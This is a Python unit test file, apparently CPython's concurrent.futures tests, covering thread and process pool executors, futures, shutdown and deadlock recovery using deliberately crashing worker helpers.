from test.support.script_helper import assert_python_ok
import contextlib
import itertools
import logging
from logging.handlers import QueueHandler
import os
import queue
import sys
import threading
import time
import unittest
import weakref
from pickle import PicklingError
from concurrent import futures
from concurrent.futures._base import (
PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future,
BrokenExecutor)
from concurrent.futures.process import BrokenProcessPool
from multiprocessing import get_context
import multiprocessing.process
import multiprocessing.util
def create_future(state=PENDING, exception=None, result=None):
f = Future()
f._state = state
f._exception = exception
f._result = result
return f
PENDING_FUTURE = create_future(state=PENDING)
RUNNING_FUTURE = create_future(state=RUNNING)
CANCELLED_FUTURE = create_future(state=CANCELLED)
CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED)
EXCEPTION_FUTURE = create_future(state=FINISHED, exception=OSError())
SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42)
INITIALIZER_STATUS = 'uninitialized'
def mul(x, y):
return x * y
def capture(*args, **kwargs):
return args, kwargs
def sleep_and_raise(t):
time.sleep(t)
raise Exception('this is an exception')
def sleep_and_print(t, msg):
time.sleep(t)
print(msg)
sys.stdout.flush()
def init(x):
global INITIALIZER_STATUS
INITIALIZER_STATUS = x
def get_init_status():
return INITIALIZER_STATUS
def init_fail(log_queue=None):
if log_queue is not None:
logger = logging.getLogger('concurrent.futures')
logger.addHandler(QueueHandler(log_queue))
logger.setLevel('CRITICAL')
logger.propagate = False
time.sleep(0.1) # let some futures be scheduled
raise ValueError('error in initializer')
class MyObject(object):
def my_method(self):
pass
class EventfulGCObj():
def __init__(self, mgr):
self.event = mgr.Event()
def __del__(self):
self.event.set()
def make_dummy_object(_):
return MyObject()
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._thread_key = test.support.threading_setup()
def tearDown(self):
test.support.reap_children()
test.support.threading_cleanup(*self._thread_key)
class ExecutorMixin:
worker_count = 5
executor_kwargs = {}
def setUp(self):
super().setUp()
self.t1 = time.monotonic()
if hasattr(self, "ctx"):
self.executor = self.executor_type(
max_workers=self.worker_count,
mp_context=self.get_context(),
**self.executor_kwargs)
else:
self.executor = self.executor_type(
max_workers=self.worker_count,
**self.executor_kwargs)
self._prime_executor()
def tearDown(self):
self.executor.shutdown(wait=True)
self.executor = None
dt = time.monotonic() - self.t1
if test.support.verbose:
print("%.2fs" % dt, end=' ')
self.assertLess(dt, 300, "synchronization issue: test lasted too long")
super().tearDown()
def get_context(self):
return get_context(self.ctx)
def _prime_executor(self):
# Make sure that the executor is ready to do work before running the
# tests. This should reduce the probability of timeouts in the tests.
futures = [self.executor.submit(time.sleep, 0.1)
for _ in range(self.worker_count)]
for f in futures:
f.result()
class ThreadPoolMixin(ExecutorMixin):
executor_type = futures.ThreadPoolExecutor
class ProcessPoolForkMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "fork"
def get_context(self):
if sys.platform in ("win32", "OpenVMS"):
self.skipTest("require unix system")
return super().get_context()
class ProcessPoolSpawnMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "spawn"
class ProcessPoolForkserverMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "forkserver"
def get_context(self):
if sys.platform in ("win32", "OpenVMS"):
self.skipTest("require unix system")
return super().get_context()
def create_executor_tests(mixin, bases=(BaseTestCase,),
executor_mixins=(ThreadPoolMixin,
ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin)):
def strip_mixin(name):
if name.endswith(('Mixin', 'Tests')):
return name[:-5]
elif name.endswith('Test'):
return name[:-4]
else:
return name
for exe in executor_mixins:
name = ("%s%sTest"
% (strip_mixin(exe.__name__), strip_mixin(mixin.__name__)))
cls = type(name, (mixin,) + (exe,) + bases, {})
globals()[name] = cls
class InitializerMixin(ExecutorMixin):
worker_count = 2
def setUp(self):
global INITIALIZER_STATUS
INITIALIZER_STATUS = 'uninitialized'
self.executor_kwargs = dict(initializer=init,
initargs=('initialized',))
super().setUp()
def test_initializer(self):
futures = [self.executor.submit(get_init_status)
for _ in range(self.worker_count)]
for f in futures:
self.assertEqual(f.result(), 'initialized')
class FailingInitializerMixin(ExecutorMixin):
worker_count = 2
def setUp(self):
if hasattr(self, "ctx"):
# Pass a queue to redirect the child's logging output
self.mp_context = self.get_context()
self.log_queue = self.mp_context.Queue()
self.executor_kwargs = dict(initializer=init_fail,
initargs=(self.log_queue,))
else:
# In a thread pool, the child shares our logging setup
# (see _assert_logged())
self.mp_context = None
self.log_queue = None
self.executor_kwargs = dict(initializer=init_fail)
super().setUp()
def test_initializer(self):
with self._assert_logged('ValueError: error in initializer'):
try:
future = self.executor.submit(get_init_status)
except BrokenExecutor:
# Perhaps the executor is already broken
pass
else:
with self.assertRaises(BrokenExecutor):
future.result()
# At some point, the executor should break
t1 = time.monotonic()
while not self.executor._broken:
if time.monotonic() - t1 > 5:
self.fail("executor not broken after 5 s.")
time.sleep(0.01)
# ... and from this point submit() is guaranteed to fail
with self.assertRaises(BrokenExecutor):
self.executor.submit(get_init_status)
def _prime_executor(self):
pass
@contextlib.contextmanager
def _assert_logged(self, msg):
if self.log_queue is not None:
yield
output = []
try:
while True:
output.append(self.log_queue.get_nowait().getMessage())
except queue.Empty:
pass
else:
with self.assertLogs('concurrent.futures', 'CRITICAL') as cm:
yield
output = cm.output
self.assertTrue(any(msg in line for line in output),
output)
create_executor_tests(InitializerMixin)
create_executor_tests(FailingInitializerMixin)
class ExecutorShutdownTest:
def test_run_after_shutdown(self):
self.executor.shutdown()
self.assertRaises(RuntimeError,
self.executor.submit,
pow, 2, 5)
def test_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
from concurrent.futures import {executor_type}
from time import sleep
from test.test_concurrent_futures import sleep_and_print
if __name__ == "__main__":
context = '{context}'
if context == "":
t = {executor_type}(5)
else:
from multiprocessing import get_context
context = get_context(context)
t = {executor_type}(5, mp_context=context)
t.submit(sleep_and_print, 1.0, "apple")
""".format(executor_type=self.executor_type.__name__,
context=getattr(self, "ctx", "")))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertFalse(err)
self.assertEqual(out.strip(), b"apple")
def test_submit_after_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
import atexit
@atexit.register
def run_last():
try:
t.submit(id, None)
except RuntimeError:
print("runtime-error")
raise
from concurrent.futures import {executor_type}
if __name__ == "__main__":
context = '{context}'
if not context:
t = {executor_type}(5)
else:
from multiprocessing import get_context
context = get_context(context)
t = {executor_type}(5, mp_context=context)
t.submit(id, 42).result()
""".format(executor_type=self.executor_type.__name__,
context=getattr(self, "ctx", "")))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertIn("RuntimeError: cannot schedule new futures", err.decode())
self.assertEqual(out.strip(), b"runtime-error")
def test_hang_issue12364(self):
fs = [self.executor.submit(time.sleep, 0.1) for _ in range(50)]
self.executor.shutdown()
for f in fs:
f.result()
class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest, BaseTestCase):
def _prime_executor(self):
pass
def test_threads_terminate(self):
def acquire_lock(lock):
lock.acquire()
sem = threading.Semaphore(0)
for i in range(3):
self.executor.submit(acquire_lock, sem)
self.assertEqual(len(self.executor._threads), 3)
for i in range(3):
sem.release()
self.executor.shutdown()
for t in self.executor._threads:
t.join()
def test_context_manager_shutdown(self):
with futures.ThreadPoolExecutor(max_workers=5) as e:
executor = e
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for t in executor._threads:
t.join()
def test_del_shutdown(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
t.join()
def test_thread_names_assigned(self):
executor = futures.ThreadPoolExecutor(
max_workers=5, thread_name_prefix='SpecialPool')
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
self.assertRegex(t.name, r'^SpecialPool_[0-4]$')
t.join()
def test_thread_names_default(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
# Ensure that our default name is reasonably sane and unique when
# no thread_name_prefix was supplied.
self.assertRegex(t.name, r'ThreadPoolExecutor-\d+_[0-4]$')
t.join()
class ProcessPoolShutdownTest(ExecutorShutdownTest):
def _prime_executor(self):
pass
def test_processes_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._processes), 5)
processes = self.executor._processes
self.executor.shutdown()
for p in processes.values():
p.join()
def test_context_manager_shutdown(self):
with futures.ProcessPoolExecutor(max_workers=5) as e:
processes = e._processes
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for p in processes.values():
p.join()
def test_del_shutdown(self):
executor = futures.ProcessPoolExecutor(max_workers=5)
list(executor.map(abs, range(-5, 5)))
queue_management_thread = executor._queue_management_thread
processes = executor._processes
call_queue = executor._call_queue
queue_management_thread = executor._queue_management_thread
del executor
# Make sure that all the executor resources were properly cleaned by
# the shutdown process
queue_management_thread.join()
for p in processes.values():
p.join()
call_queue.join_thread()
create_executor_tests(ProcessPoolShutdownTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
class WaitTests:
def test_first_completed(self):
future1 = self.executor.submit(mul, 21, 2)
future2 = self.executor.submit(time.sleep, 1.5 if sys.platform != 'OpenVMS' else 5)
done, not_done = futures.wait(
[CANCELLED_FUTURE, future1, future2],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(set([future1]), done)
self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done)
def test_first_completed_some_already_completed(self):
future1 = self.executor.submit(time.sleep, 1.5 if sys.platform != 'OpenVMS' else 5)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(
set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]),
finished)
self.assertEqual(set([future1]), pending)
def test_first_exception(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(sleep_and_raise, 1.5 if sys.platform != 'OpenVMS' else 5)
future3 = self.executor.submit(time.sleep, 3 if sys.platform != 'OpenVMS' else 10)
finished, pending = futures.wait(
[future1, future2, future3],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([future1, future2]), finished)
self.assertEqual(set([future3]), pending)
def test_first_exception_some_already_complete(self):
future1 = self.executor.submit(divmod, 21, 0)
future2 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1, future2],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1]), finished)
self.assertEqual(set([CANCELLED_FUTURE, future2]), pending)
def test_first_exception_one_already_failed(self):
future1 = self.executor.submit(time.sleep, 2)
finished, pending = futures.wait(
[EXCEPTION_FUTURE, future1],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([EXCEPTION_FUTURE]), finished)
self.assertEqual(set([future1]), pending)
def test_all_completed(self):
future1 = self.executor.submit(divmod, 2, 0)
future2 = self.executor.submit(mul, 2, 21)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2],
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2]), finished)
self.assertEqual(set(), pending)
def test_timeout(self):
future1 = self.executor.submit(mul, 6, 7)
future2 = self.executor.submit(time.sleep, 6)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2],
timeout=5,
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1]), finished)
self.assertEqual(set([future2]), pending)
class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests, BaseTestCase):
def test_pending_calls_race(self):
# Issue #14406: multi-threaded race condition when waiting on all
# futures.
event = threading.Event()
def future_func():
event.wait()
oldswitchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
try:
fs = {self.executor.submit(future_func) for i in range(100)}
event.set()
futures.wait(fs, return_when=futures.ALL_COMPLETED)
finally:
sys.setswitchinterval(oldswitchinterval)
create_executor_tests(WaitTests,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
class AsCompletedTests:
# TODO(brian@sweetapp.com): Should have a test with a non-zero timeout.
def test_no_timeout(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(mul, 7, 6)
completed = set(futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]))
self.assertEqual(set(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]),
completed)
def test_zero_timeout(self):
future1 = self.executor.submit(time.sleep, 2)
completed_futures = set()
try:
for future in futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1],
timeout=0):
completed_futures.add(future)
except futures.TimeoutError:
pass
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE]),
completed_futures)
def test_duplicate_futures(self):
# Issue 20367. Duplicate futures should not raise exceptions or give
# duplicate responses.
# Issue #31641: accept arbitrary iterables.
future1 = self.executor.submit(time.sleep, 2)
completed = [
f for f in futures.as_completed(itertools.repeat(future1, 3))
]
self.assertEqual(len(completed), 1)
def test_free_reference_yielded_future(self):
# Issue #14406: Generator should not keep references
# to finished futures.
futures_list = [Future() for _ in range(8)]
futures_list.append(create_future(state=CANCELLED_AND_NOTIFIED))
futures_list.append(create_future(state=FINISHED, result=42))
with self.assertRaises(futures.TimeoutError):
for future in futures.as_completed(futures_list, timeout=0):
futures_list.remove(future)
wr = weakref.ref(future)
del future
self.assertIsNone(wr())
futures_list[0].set_result("test")
for future in futures.as_completed(futures_list):
futures_list.remove(future)
wr = weakref.ref(future)
del future
self.assertIsNone(wr())
if futures_list:
futures_list[0].set_result("test")
def test_correct_timeout_exception_msg(self):
futures_list = [CANCELLED_AND_NOTIFIED_FUTURE, PENDING_FUTURE,
RUNNING_FUTURE, SUCCESSFUL_FUTURE]
with self.assertRaises(futures.TimeoutError) as cm:
list(futures.as_completed(futures_list, timeout=0))
self.assertEqual(str(cm.exception), '2 (of 4) futures unfinished')
create_executor_tests(AsCompletedTests)
class ExecutorTest:
# Executor.shutdown() and context manager usage is tested by
# ExecutorShutdownTest.
def test_submit(self):
future = self.executor.submit(pow, 2, 8)
self.assertEqual(256, future.result())
def test_submit_keyword(self):
future = self.executor.submit(mul, 2, y=8)
self.assertEqual(16, future.result())
future = self.executor.submit(capture, 1, self=2, fn=3)
self.assertEqual(future.result(), ((1,), {'self': 2, 'fn': 3}))
with self.assertWarns(DeprecationWarning):
future = self.executor.submit(fn=capture, arg=1)
self.assertEqual(future.result(), ((), {'arg': 1}))
with self.assertRaises(TypeError):
self.executor.submit(arg=1)
def test_map(self):
self.assertEqual(
list(self.executor.map(pow, range(10), range(10))),
list(map(pow, range(10), range(10))))
self.assertEqual(
list(self.executor.map(pow, range(10), range(10), chunksize=3)),
list(map(pow, range(10), range(10))))
def test_map_exception(self):
i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5])
self.assertEqual(i.__next__(), (0, 1))
self.assertEqual(i.__next__(), (0, 1))
self.assertRaises(ZeroDivisionError, i.__next__)
def test_map_timeout(self):
results = []
try:
for i in self.executor.map(time.sleep,
[0, 0, 6],
timeout=5):
results.append(i)
except futures.TimeoutError:
pass
else:
self.fail('expected TimeoutError')
self.assertEqual([None, None], results)
def test_shutdown_race_issue12456(self):
# Issue #12456: race condition at shutdown where trying to post a
# sentinel in the call queue blocks (the queue is full while processes
# have exited).
self.executor.map(str, [2] * (self.worker_count + 1))
self.executor.shutdown()
@test.support.cpython_only
def test_no_stale_references(self):
# Issue #16284: check that the executors don't unnecessarily hang onto
# references.
my_object = MyObject()
my_object_collected = threading.Event()
my_object_callback = weakref.ref(
my_object, lambda obj: my_object_collected.set())
# Deliberately discarding the future.
self.executor.submit(my_object.my_method)
del my_object
collected = my_object_collected.wait(timeout=5.0)
self.assertTrue(collected,
"Stale reference not collected within timeout.")
def test_max_workers_negative(self):
for number in (0, -1):
with self.assertRaisesRegex(ValueError,
"max_workers must be greater "
"than 0"):
self.executor_type(max_workers=number)
def test_free_reference(self):
# Issue #14406: Result iterator should not keep an internal
# reference to result objects.
for obj in self.executor.map(make_dummy_object, range(10)):
wr = weakref.ref(obj)
del obj
self.assertIsNone(wr())
class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest, BaseTestCase):
def test_map_submits_without_iteration(self):
"""Tests verifying issue 11777."""
finished = []
def record_finished(n):
finished.append(n)
self.executor.map(record_finished, range(10))
self.executor.shutdown(wait=True)
self.assertCountEqual(finished, range(10))
def test_default_workers(self):
executor = self.executor_type()
expected = min(32, (os.cpu_count() or 1) + 4)
self.assertEqual(executor._max_workers, expected)
def test_saturation(self):
executor = self.executor_type(4)
def acquire_lock(lock):
lock.acquire()
sem = threading.Semaphore(0)
for i in range(15 * executor._max_workers):
executor.submit(acquire_lock, sem)
self.assertEqual(len(executor._threads), executor._max_workers)
for i in range(15 * executor._max_workers):
sem.release()
executor.shutdown(wait=True)
def test_idle_thread_reuse(self):
executor = self.executor_type()
executor.submit(mul, 21, 2).result()
executor.submit(mul, 6, 7).result()
executor.submit(mul, 3, 14).result()
self.assertEqual(len(executor._threads), 1)
executor.shutdown(wait=True)
class ProcessPoolExecutorTest(ExecutorTest):
@unittest.skipUnless(sys.platform=='win32', 'Windows-only process limit')
def test_max_workers_too_large(self):
with self.assertRaisesRegex(ValueError,
"max_workers must be <= 61"):
futures.ProcessPoolExecutor(max_workers=62)
def test_killed_child(self):
# When a child process is abruptly terminated, the whole pool gets
# "broken".
futures = [self.executor.submit(time.sleep, 3)]
# Get one of the processes, and terminate (kill) it
p = next(iter(self.executor._processes.values()))
p.terminate()
for fut in futures:
self.assertRaises(BrokenProcessPool, fut.result)
# Submitting other jobs fails as well.
self.assertRaises(BrokenProcessPool, self.executor.submit, pow, 2, 8)
def test_map_chunksize(self):
def bad_map():
list(self.executor.map(pow, range(40), range(40), chunksize=-1))
ref = list(map(pow, range(40), range(40)))
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=6)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=50)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=40)),
ref)
self.assertRaises(ValueError, bad_map)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
future = self.executor.submit(self._test_traceback)
with self.assertRaises(Exception) as cm:
future.result()
exc = cm.exception
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), futures.process._RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
def test_ressources_gced_in_workers(self):
# Ensure that argument for a job are correctly gc-ed after the job
# is finished
mgr = get_context(self.ctx).Manager()
obj = EventfulGCObj(mgr)
future = self.executor.submit(id, obj)
future.result()
self.assertTrue(obj.event.wait(timeout=1))
# explicitly destroy the object to ensure that EventfulGCObj.__del__()
# is called while manager is still running.
obj = None
test.support.gc_collect()
mgr.shutdown()
mgr.join()
create_executor_tests(ProcessPoolExecutorTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
def hide_process_stderr():
import io
sys.stderr = io.StringIO()
def _crash(delay=None):
"""Induces a segfault."""
if delay:
time.sleep(delay)
import faulthandler
faulthandler.disable()
faulthandler._sigsegv()
def _exit():
"""Induces a sys exit with exitcode 1."""
sys.exit(1)
def _raise_error(Err):
"""Function that raises an Exception in process."""
hide_process_stderr()
raise Err()
def _return_instance(cls):
"""Function that returns a instance of cls."""
hide_process_stderr()
return cls()
class CrashAtPickle(object):
"""Bad object that triggers a segfault at pickling time."""
def __reduce__(self):
_crash()
class CrashAtUnpickle(object):
"""Bad object that triggers a segfault at unpickling time."""
def __reduce__(self):
return _crash, ()
class ExitAtPickle(object):
"""Bad object that triggers a process exit at pickling time."""
def __reduce__(self):
_exit()
class ExitAtUnpickle(object):
"""Bad object that triggers a process exit at unpickling time."""
def __reduce__(self):
return _exit, ()
class ErrorAtPickle(object):
"""Bad object that triggers an error at pickling time."""
def __reduce__(self):
from pickle import PicklingError
raise PicklingError("Error in pickle")
class ErrorAtUnpickle(object):
"""Bad object that triggers an error at unpickling time."""
def __reduce__(self):
from pickle import UnpicklingError
return _raise_error, (UnpicklingError, )
class ExecutorDeadlockTest:
TIMEOUT = 15
@classmethod
def _sleep_id(cls, x, delay):
time.sleep(delay)
return x
def _fail_on_deadlock(self, executor):
# If we did not recover before TIMEOUT seconds, consider that the
# executor is in a deadlock state and forcefully clean all its
# composants.
import faulthandler
from tempfile import TemporaryFile
with TemporaryFile(mode="w+") as f:
faulthandler.dump_traceback(file=f)
f.seek(0)
tb = f.read()
for p in executor._processes.values():
p.terminate()
# This should be safe to call executor.shutdown here as all possible
# deadlocks should have been broken.
executor.shutdown(wait=True)
print(f"\nTraceback:\n {tb}", file=sys.__stderr__)
self.fail(f"Executor deadlock:\n\n{tb}")
def test_crash(self):
# extensive testing for deadlock caused by crashes in a pool.
self.executor.shutdown(wait=True)
crash_cases = [
# Check problem occurring while pickling a task in
# the task_handler thread
(id, (ErrorAtPickle(),), PicklingError, "error at task pickle"),
# Check problem occurring while unpickling a task on workers
(id, (ExitAtUnpickle(),), BrokenProcessPool,
"exit at task unpickle"),
(id, (ErrorAtUnpickle(),), BrokenProcessPool,
"error at task unpickle"),
(id, (CrashAtUnpickle(),), BrokenProcessPool,
"crash at task unpickle"),
# Check problem occurring during func execution on workers
(_crash, (), BrokenProcessPool,
"crash during func execution on worker"),
(_exit, (), SystemExit,
"exit during func execution on worker"),
(_raise_error, (RuntimeError, ), RuntimeError,
"error during func execution on worker"),
# Check problem occurring while pickling a task result
# on workers
(_return_instance, (CrashAtPickle,), BrokenProcessPool,
"crash during result pickle on worker"),
(_return_instance, (ExitAtPickle,), SystemExit,
"exit during result pickle on worker"),
(_return_instance, (ErrorAtPickle,), PicklingError,
"error during result pickle on worker"),
# Check problem occurring while unpickling a task in
# the result_handler thread
(_return_instance, (ErrorAtUnpickle,), BrokenProcessPool,
"error during result unpickle in result_handler"),
(_return_instance, (ExitAtUnpickle,), BrokenProcessPool,
"exit during result unpickle in result_handler")
]
for func, args, error, name in crash_cases:
with self.subTest(name):
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
executor = self.executor_type(
max_workers=2, mp_context=get_context(self.ctx))
res = executor.submit(func, *args)
with self.assertRaises(error):
try:
res.result(timeout=self.TIMEOUT)
except futures.TimeoutError:
# If we did not recover before TIMEOUT seconds,
# consider that the executor is in a deadlock state
self._fail_on_deadlock(executor)
executor.shutdown(wait=True)
def test_shutdown_deadlock(self):
# Test that the pool calling shutdown do not cause deadlock
# if a worker fails after the shutdown call.
self.executor.shutdown(wait=True)
with self.executor_type(max_workers=2,
mp_context=get_context(self.ctx)) as executor:
self.executor = executor # Allow clean up in fail_on_deadlock
f = executor.submit(_crash, delay=.1)
executor.shutdown(wait=True)
with self.assertRaises(BrokenProcessPool):
f.result()
create_executor_tests(ExecutorDeadlockTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
class FutureTests(BaseTestCase):
def test_done_callback_with_result(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.add_done_callback(fn)
f.set_result(5)
self.assertEqual(5, callback_result)
def test_done_callback_with_exception(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.add_done_callback(fn)
f.set_exception(Exception('test'))
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_with_cancel(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
f.add_done_callback(fn)
self.assertTrue(f.cancel())
self.assertTrue(was_cancelled)
def test_done_callback_raises(self):
with test.support.captured_stderr() as stderr:
raising_was_called = False
fn_was_called = False
def raising_fn(callback_future):
nonlocal raising_was_called
raising_was_called = True
raise Exception('doh!')
def fn(callback_future):
nonlocal fn_was_called
fn_was_called = True
f = Future()
f.add_done_callback(raising_fn)
f.add_done_callback(fn)
f.set_result(5)
self.assertTrue(raising_was_called)
self.assertTrue(fn_was_called)
self.assertIn('Exception: doh!', stderr.getvalue())
def test_done_callback_already_successful(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.set_result(5)
f.add_done_callback(fn)
self.assertEqual(5, callback_result)
def test_done_callback_already_failed(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.set_exception(Exception('test'))
f.add_done_callback(fn)
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_already_cancelled(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
self.assertTrue(f.cancel())
f.add_done_callback(fn)
self.assertTrue(was_cancelled)
def test_done_callback_raises_already_succeeded(self):
with test.support.captured_stderr() as stderr:
def raising_fn(callback_future):
raise Exception('doh!')
f = Future()
# Set the result first to simulate a future that runs instantly,
# effectively allowing the callback to be run immediately.
f.set_result(5)
f.add_done_callback(raising_fn)
self.assertIn('exception calling callback for', stderr.getvalue())
self.assertIn('doh!', stderr.getvalue())
def test_repr(self):
self.assertRegex(repr(PENDING_FUTURE),
'<Future at 0x[0-9a-f]+ state=pending>')
self.assertRegex(repr(RUNNING_FUTURE),
'<Future at 0x[0-9a-f]+ state=running>')
self.assertRegex(repr(CANCELLED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(repr(CANCELLED_AND_NOTIFIED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(
repr(EXCEPTION_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished raised OSError>')
self.assertRegex(
repr(SUCCESSFUL_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished returned int>')
def test_cancel(self):
f1 = create_future(state=PENDING)
f2 = create_future(state=RUNNING)
f3 = create_future(state=CANCELLED)
f4 = create_future(state=CANCELLED_AND_NOTIFIED)
f5 = create_future(state=FINISHED, exception=OSError())
f6 = create_future(state=FINISHED, result=5)
self.assertTrue(f1.cancel())
self.assertEqual(f1._state, CANCELLED)
self.assertFalse(f2.cancel())
self.assertEqual(f2._state, RUNNING)
self.assertTrue(f3.cancel())
self.assertEqual(f3._state, CANCELLED)
self.assertTrue(f4.cancel())
self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED)
self.assertFalse(f5.cancel())
self.assertEqual(f5._state, FINISHED)
self.assertFalse(f6.cancel())
self.assertEqual(f6._state, FINISHED)
def test_cancelled(self):
self.assertFalse(PENDING_FUTURE.cancelled())
self.assertFalse(RUNNING_FUTURE.cancelled())
self.assertTrue(CANCELLED_FUTURE.cancelled())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled())
self.assertFalse(EXCEPTION_FUTURE.cancelled())
self.assertFalse(SUCCESSFUL_FUTURE.cancelled())
def test_done(self):
self.assertFalse(PENDING_FUTURE.done())
self.assertFalse(RUNNING_FUTURE.done())
self.assertTrue(CANCELLED_FUTURE.done())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done())
self.assertTrue(EXCEPTION_FUTURE.done())
self.assertTrue(SUCCESSFUL_FUTURE.done())
def test_running(self):
self.assertFalse(PENDING_FUTURE.running())
self.assertTrue(RUNNING_FUTURE.running())
self.assertFalse(CANCELLED_FUTURE.running())
self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running())
self.assertFalse(EXCEPTION_FUTURE.running())
self.assertFalse(SUCCESSFUL_FUTURE.running())
def test_result_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.result, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0)
self.assertRaises(OSError, EXCEPTION_FUTURE.result, timeout=0)
